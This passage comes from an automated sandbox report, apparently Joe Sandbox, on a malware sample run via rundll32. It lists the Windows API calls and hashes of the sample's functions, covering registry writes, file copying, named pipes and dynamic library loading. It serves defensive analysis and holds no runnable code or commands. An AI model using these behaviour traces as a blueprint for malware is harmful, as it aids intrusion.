                              • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,059485F1,?,00000000,0000001E,00000001,00000057,?), ref: 0593C243
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                              • String ID:
                              • API String ID: 3323474148-0
                              • Opcode ID: 64cc7742204ba5dc1a61e5abff24c1a7b040b1f3d75b84e913e36f7529c77bb3
                              • Instruction ID: 76a276a64a822fb7a1d48cbc898f06ca6647798a40898a57ce8f9b78957dbd9d
                              • Opcode Fuzzy Hash: 64cc7742204ba5dc1a61e5abff24c1a7b040b1f3d75b84e913e36f7529c77bb3
                              • Instruction Fuzzy Hash: 58716972108741EFDB21DF64C846A5ABBE8FF48314F044A2DF59AE3250DB31E954CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,00000000), ref: 059405D3
                              • lstrlen.KERNEL32(?,?,00000000), ref: 059405DA
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059405F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 05940602
                              • lstrcat.KERNEL32(?,?), ref: 0594061E
                              • lstrcat.KERNEL32(?,?), ref: 0594062F
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05940640
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059406DD
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 05940716
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0594072F
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 05940739
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05940749
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05940762
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05940772
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                              • String ID:
                              • API String ID: 333890978-0
                              • Opcode ID: e758ae5206b9411ef0574b9f9891bf45a91eb574578e773628e5a716b7dd4fdc
                              • Instruction ID: 1591bd14413fe41ee0743abaece5cc24cf68e296908fa003537c331076c5001d
                              • Opcode Fuzzy Hash: e758ae5206b9411ef0574b9f9891bf45a91eb574578e773628e5a716b7dd4fdc
                              • Instruction Fuzzy Hash: 8B517A76814209FFDB019FA4DC89CAEBFBDFB49250B054425FA0A9B110DB319E55DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,?,0593663D,?,?), ref: 0594AFCF
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0593663D,?,?), ref: 0594AFF8
                              • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0594B018
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 0594B034
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B040
                              • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0593663D,?,?), ref: 0594B043
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B04F
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B06C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B086
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B09C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B0B2
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B0C8
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0594B0DE
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,0593663D,?,?), ref: 0594B107
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                              • String ID:
                              • API String ID: 3772355505-0
                              • Opcode ID: 2c269be0c745ec28b3bff89b9d517f9deb7535b51f2a7b328ad67cc2bf67433b
                              • Instruction ID: e59755dbc3ff74024791f88b61afab462afc34ad1a693be452a3b25933f7fdeb
                              • Opcode Fuzzy Hash: 2c269be0c745ec28b3bff89b9d517f9deb7535b51f2a7b328ad67cc2bf67433b
                              • Instruction Fuzzy Hash: 6B3135B161830BAFDB109F64DD85D66BBECEF08255B014526F909C7252EB78EC24CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D02D
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D038
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D040
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593D055
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0593D066
                              • lstrcatW.KERNEL32(00000000,?), ref: 0593D078
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D07D
                              • lstrcatW.KERNEL32(00000000,059553E0), ref: 0593D089
                              • lstrcatW.KERNEL32(00000000), ref: 0593D092
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D097
                              • lstrcatW.KERNEL32(00000000,059553E0), ref: 0593D0A3
                              • lstrcatW.KERNEL32(00000000,00000002), ref: 0593D0BF
                              • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D0C7
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05941453,?,?,?), ref: 0593D0D5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                              • String ID:
                              • API String ID: 3635185113-0
                              • Opcode ID: dee9a43cca79b044ef6a08b4a78ac267c80248c3150465ad492f980c451ee8ee
                              • Instruction ID: 108ff9b6e4c762998b819b355eba296cf9ee75f1ff512cf05dffc94c24883641
                              • Opcode Fuzzy Hash: dee9a43cca79b044ef6a08b4a78ac267c80248c3150465ad492f980c451ee8ee
                              • Instruction Fuzzy Hash: 7321CF32218305EFD3216F24DC86E7FFFACEF85A91F020519F90992112DF6098269BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05937A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05937AA6
                                • Part of subcall function 05937A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05937ABE
                                • Part of subcall function 05937A61: WaitForSingleObject.KERNEL32(00000000,?,059487CC,?,?), ref: 05937B86
                                • Part of subcall function 05937A61: HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BAF
                                • Part of subcall function 05937A61: HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BBF
                                • Part of subcall function 05937A61: RegCloseKey.ADVAPI32(?,?,059487CC,?,?), ref: 05937BC8
                              • lstrcmp.KERNEL32(?,00000000), ref: 0594E211
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0593399C,00000000,00000000), ref: 0594E23D
                              • GetCurrentThreadId.KERNEL32 ref: 0594E2EE
                              • GetCurrentThread.KERNEL32 ref: 0594E2FF
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,0593399C,00000001,76CDF730,00000000,00000000), ref: 0594E33C
                              • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,0593399C,00000001,76CDF730,00000000,00000000), ref: 0594E350
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0594E35E
                              • wsprintfA.USER32 ref: 0594E376
                                • Part of subcall function 05933263: lstrlen.KERNEL32(?,00000000,05953716,00000000,05942466,?,?,?,05948A07,?,?,?,00000000,00000001,00000000,?), ref: 0593326D
                                • Part of subcall function 05933263: lstrcpy.KERNEL32(00000000,?), ref: 05933291
                                • Part of subcall function 05933263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05948A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05933298
                                • Part of subcall function 05933263: lstrcat.KERNEL32(00000000,?), ref: 059332EF
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0594E381
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0594E398
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594E3A9
                              • HeapFree.KERNEL32(00000000,?), ref: 0594E3B5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                              • String ID:
                              • API String ID: 773763258-0
                              • Opcode ID: e593e81cf87251dbeeb969f68cb7d4bd9131d8f68ce0b2e04680b4dea87dc692
                              • Instruction ID: a664ea9978900e7ff6cb83e1cb56f2bd6b5c54bf93bc4a7167fbfc0486214284
                              • Opcode Fuzzy Hash: e593e81cf87251dbeeb969f68cb7d4bd9131d8f68ce0b2e04680b4dea87dc692
                              • Instruction Fuzzy Hash: 32712171914219EFCB12DFA4D889EAEBFB9FF09311F048125F605A7220DB30AA55DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05935226
                              • memcpy.NTDLL(?,?,00000010), ref: 05935249
                              • memset.NTDLL ref: 05935295
                              • lstrcpyn.KERNEL32(?,?,00000034), ref: 059352A9
                              • GetLastError.KERNEL32 ref: 059352D7
                              • GetLastError.KERNEL32 ref: 0593531E
                              • GetLastError.KERNEL32 ref: 0593533D
                              • WaitForSingleObject.KERNEL32(?,000927C0), ref: 05935377
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05935385
                              • GetLastError.KERNEL32 ref: 05935408
                              • ReleaseMutex.KERNEL32(?), ref: 0593541A
                              • RtlExitUserThread.NTDLL(?), ref: 05935430
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                              • String ID:
                              • API String ID: 4037736292-0
                              • Opcode ID: 8da0e8b0a3eb6bc2115f2880f14c885479580addbd49ad13cfa0fb8ca664a3ce
                              • Instruction ID: 3e8174789292fd8f7e3c4f10d09acf6dd24792f7e92b3cb6bed43337b0ddc1d0
                              • Opcode Fuzzy Hash: 8da0e8b0a3eb6bc2115f2880f14c885479580addbd49ad13cfa0fb8ca664a3ce
                              • Instruction Fuzzy Hash: 75618C71518700EFD7119F25D84AA6BBBEDFF88721F018A29F596D2180EBB0E914CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0593DA0C
                              • lstrlen.KERNEL32(?), ref: 0593DA14
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593DA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593DA43
                              • lstrlen.KERNEL32(?), ref: 0593DA58
                              • lstrlen.KERNEL32(?), ref: 0593DA66
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0593DAB4
                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0593DAD8
                              • lstrlen.KERNEL32(?), ref: 0593DB0B
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0593DB36
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0593DB4D
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0593DB5A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                              • String ID:
                              • API String ID: 904523553-0
                              • Opcode ID: 607409ad76adfa6a773a9094df36b77d91fc24189aa18cc5a31176ec71cbe06b
                              • Instruction ID: fd17b7d5bcb0c1bf9af1f900315927b9b3ae6d4eef4c45e3598a729c9c5079e9
                              • Opcode Fuzzy Hash: 607409ad76adfa6a773a9094df36b77d91fc24189aa18cc5a31176ec71cbe06b
                              • Instruction Fuzzy Hash: 0F41687190434AEFCF128FA4CC56EAEBFBAFB45390F148065F81597150DB30A925DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0594201B
                              • WaitForSingleObject.KERNEL32(00000330,00000000), ref: 0594203D
                              • ConnectNamedPipe.KERNEL32(?,?), ref: 0594205D
                              • GetLastError.KERNEL32 ref: 05942067
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0594208B
                              • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 059420CE
                              • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 059420D7
                              • WaitForSingleObject.KERNEL32(00000000), ref: 059420E0
                              • CloseHandle.KERNEL32(?), ref: 059420F5
                              • GetLastError.KERNEL32 ref: 05942102
                              • CloseHandle.KERNEL32(?), ref: 0594210F
                              • RtlExitUserThread.NTDLL(000000FF), ref: 05942125
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                              • String ID:
                              • API String ID: 4053378866-0
                              • Opcode ID: 3919d21899beb85eb7d3271281083e03d8f4a284b875957ed6a60c3a20363395
                              • Instruction ID: 34eb871415a9ae3885ad234c61e4e66049fc21ba0064f4903a8f223095a04fbd
                              • Opcode Fuzzy Hash: 3919d21899beb85eb7d3271281083e03d8f4a284b875957ed6a60c3a20363395
                              • Instruction Fuzzy Hash: 61317A74418305AFEB109F34C889D6FBFA9FF48324F114A29F966921A0DB709D55CF92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL(?), ref: 05944151
                              • GetTempPathA.KERNEL32(00000000,00000000,?,?,059409CF,00000094,00000000,00000000,?), ref: 05944169
                              • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 05944178
                              • GetTempPathA.KERNEL32(00000001,00000000,?,?,059409CF,00000094,00000000,00000000,?), ref: 0594418B
                              • GetTickCount.KERNEL32 ref: 0594418F
                              • wsprintfA.USER32 ref: 059441A6
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059441E1
                              • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 05944201
                              • lstrlen.KERNEL32(00000000), ref: 0594420B
                              • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0594421B
                              • RegCloseKey.ADVAPI32(?), ref: 05944227
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 05944235

                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 059350BD
                              • GetCurrentThreadId.KERNEL32 ref: 059350D3
                              • GetCurrentThread.KERNEL32 ref: 059350E4
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                                • Part of subcall function 05950551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0593512E,00000020,00000000,?,00000000), ref: 059505BC
                                • Part of subcall function 05950551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0593512E,00000020,00000000,?,00000000), ref: 059505E4
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0593515E
                              • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0593516A
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 059351B9
                              • wsprintfA.USER32 ref: 059351D1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 059351DC
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 059351F3

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0594B82F
                                • Part of subcall function 0594447B: RegCloseKey.ADVAPI32(?,?), ref: 05944502
                              • RegOpenKeyA.ADVAPI32(80000001,05944833,?), ref: 0594B86A
                              • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 0594B8CC
                              • lstrcatW.KERNEL32(00000000,?), ref: 0594B8E1
                              • lstrcpyW.KERNEL32(?), ref: 0594B8FB
                              • lstrcatW.KERNEL32(00000000,?), ref: 0594B90A
                                • Part of subcall function 0594452B: lstrlenW.KERNEL32(?,?,?,0593E51D,?,?,?,?,00001000,?,?,00001000), ref: 0594453E
                                • Part of subcall function 0594452B: lstrlen.KERNEL32(?,?,0593E51D,?,?,?,?,00001000,?,?,00001000), ref: 05944549
                                • Part of subcall function 0594452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0594455E
                              • RegCloseKey.ADVAPI32(05944833,?,?,05944833), ref: 0594B974
                                • Part of subcall function 0593C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0593171E,?,?,00000000,?), ref: 0593C2B6
                                • Part of subcall function 0593C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0593171E,?,?,00000000,?), ref: 0593C2DE
                                • Part of subcall function 0593C2AA: memset.NTDLL ref: 0593C2F0
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,05944833), ref: 0594B9A9
                              • GetLastError.KERNEL32(?,?,05944833), ref: 0594B9B4
                              • HeapFree.KERNEL32(00000000,00000000,?,?,05944833), ref: 0594B9CA
                              • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,05944833), ref: 0594B9DC

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05945389
                              • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0594539E
                              • RegCreateKeyA.ADVAPI32(80000001,?), ref: 059453C6
                              • HeapFree.KERNEL32(00000000,?), ref: 05945407
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05945417
                              • RtlAllocateHeap.NTDLL(00000000,0593DA9D), ref: 0594542A
                              • RtlAllocateHeap.NTDLL(00000000,0593DA9D), ref: 05945439
                              • HeapFree.KERNEL32(00000000,00000000,?,0593DA9D,00000000,?,?,?), ref: 05945483
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0593DA9D,00000000,?,?,?,?), ref: 059454A7
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0593DA9D,00000000,?,?,?), ref: 059454CC
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0593DA9D,00000000,?,?,?), ref: 059454E1

                              APIs
                              • PathFindFileNameW.SHLWAPI(?), ref: 0593CEDD
                              • PathFindFileNameW.SHLWAPI(?), ref: 0593CEF3
                              • lstrlenW.KERNEL32(00000000), ref: 0593CF36
                              • RtlAllocateHeap.NTDLL(00000000,0595350B), ref: 0593CF4C
                              • memcpy.NTDLL(00000000,00000000,05953509), ref: 0593CF5F
                              • _wcsupr.NTDLL ref: 0593CF6B
                              • lstrlenW.KERNEL32(?,05953509), ref: 0593CFA4
                              • RtlAllocateHeap.NTDLL(00000000,?,05953509), ref: 0593CFB9
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0593CFCF
                              • lstrcatW.KERNEL32(00000000,?), ref: 0593CFF5
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593D004

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0593163E
                                • Part of subcall function 0594447B: RegCloseKey.ADVAPI32(?,?), ref: 05944502
                              • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 0593166D
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 0593167E
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059316B8
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 059316DA
                              • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 059316E3
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 059316F9
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0593170E
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05931722
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05931737
                              • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 05931740

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 059433E4
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094), ref: 059433F6
                              • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094), ref: 05943403
                              • wsprintfA.USER32 ref: 0594341E
                              • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0593C1F8,00000000,00000094,00000000), ref: 05943434
                              • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0594344D
                              • WriteFile.KERNEL32(00000000,00000000), ref: 05943455
                              • GetLastError.KERNEL32 ref: 05943463
                              • CloseHandle.KERNEL32(00000000), ref: 0594346C
                              • GetLastError.KERNEL32(?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094,00000000), ref: 0594347D
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,05940B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0593C1F8,00000000,00000094), ref: 0594348D

                              APIs
                              • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 05938030
                              • StrChrA.SHLWAPI(00000001,0000002C), ref: 05938043
                              • StrTrimA.SHLWAPI(00000000,?), ref: 05938066
                              • StrTrimA.SHLWAPI(00000001,?), ref: 05938075
                              • lstrlen.KERNEL32(00000000), ref: 059380AA
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 059380BD
                              • lstrcpy.KERNEL32(00000004,00000000), ref: 059380DB
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 059380FF

                              APIs
                              • lstrlen.KERNEL32(05F3CBB8,00000000,00000000,00000000,?), ref: 05943CBA
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05943CC9
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05943CD6
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 05943CEE
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05943CFA
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05943D16
                              • wsprintfA.USER32 ref: 05943DF8
                              • memcpy.NTDLL(00000000,00004000,?), ref: 05943E45
                              • InterlockedExchange.KERNEL32(0595A128,00000000), ref: 05943E63
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05943EA4
                                • Part of subcall function 0594E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594E3F6
                                • Part of subcall function 0594E3CD: memcpy.NTDLL(00000000,?,?), ref: 0594E409
                                • Part of subcall function 0594E3CD: RtlEnterCriticalSection.NTDLL(0595A428), ref: 0594E41A
                                • Part of subcall function 0594E3CD: RtlLeaveCriticalSection.NTDLL(0595A428), ref: 0594E42F
                                • Part of subcall function 0594E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0594E467

                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05939100,?), ref: 05948D13
                              • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D1D
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D46
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D54
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D62
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D70
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D7E
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948D8C
                              • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 05948DB6
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,05939100,?), ref: 05948E37

                              APIs
                                • Part of subcall function 05932F91: memset.NTDLL ref: 05932FB3
                                • Part of subcall function 05932F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0593305D
                              • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0594E903
                              • CloseHandle.KERNEL32(?), ref: 0594E90F
                              • PathFindFileNameW.SHLWAPI(?), ref: 0594E91F
                              • lstrlenW.KERNEL32(00000000), ref: 0594E928
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0594E939
                              • wcstombs.NTDLL ref: 0594E948
                              • lstrlen.KERNEL32(?), ref: 0594E955
                              • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 0594E994
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594E9A7
                              • DeleteFileW.KERNEL32(?), ref: 0594E9B4

                              APIs
                              • GetTickCount.KERNEL32 ref: 0594B9F9
                              • CreateFileW.KERNEL32(05940971,80000000,00000003,0595A1E8,00000003,00000000,00000000,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA16
                              • GetLastError.KERNEL32(?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BABE
                                • Part of subcall function 0595087A: lstrlen.KERNEL32(?,00000000,0594BA3E,00000027,0595A1E8,?,00000000,?,?,0594BA3E,?,00000001,?,05940971,00000000,?), ref: 059508B0
                                • Part of subcall function 0595087A: lstrcpy.KERNEL32(00000000,00000000), ref: 059508D4
                                • Part of subcall function 0595087A: lstrcat.KERNEL32(00000000,00000000), ref: 059508DC
                              • GetFileSize.KERNEL32(05940971,00000000,?,00000001,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA49
                              • CreateFileMappingA.KERNEL32(05940971,0595A1E8,00000002,00000000,00000000,05940971), ref: 0594BA5D
                              • lstrlen.KERNEL32(05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA79
                              • lstrcpy.KERNEL32(?,05940971), ref: 0594BA89
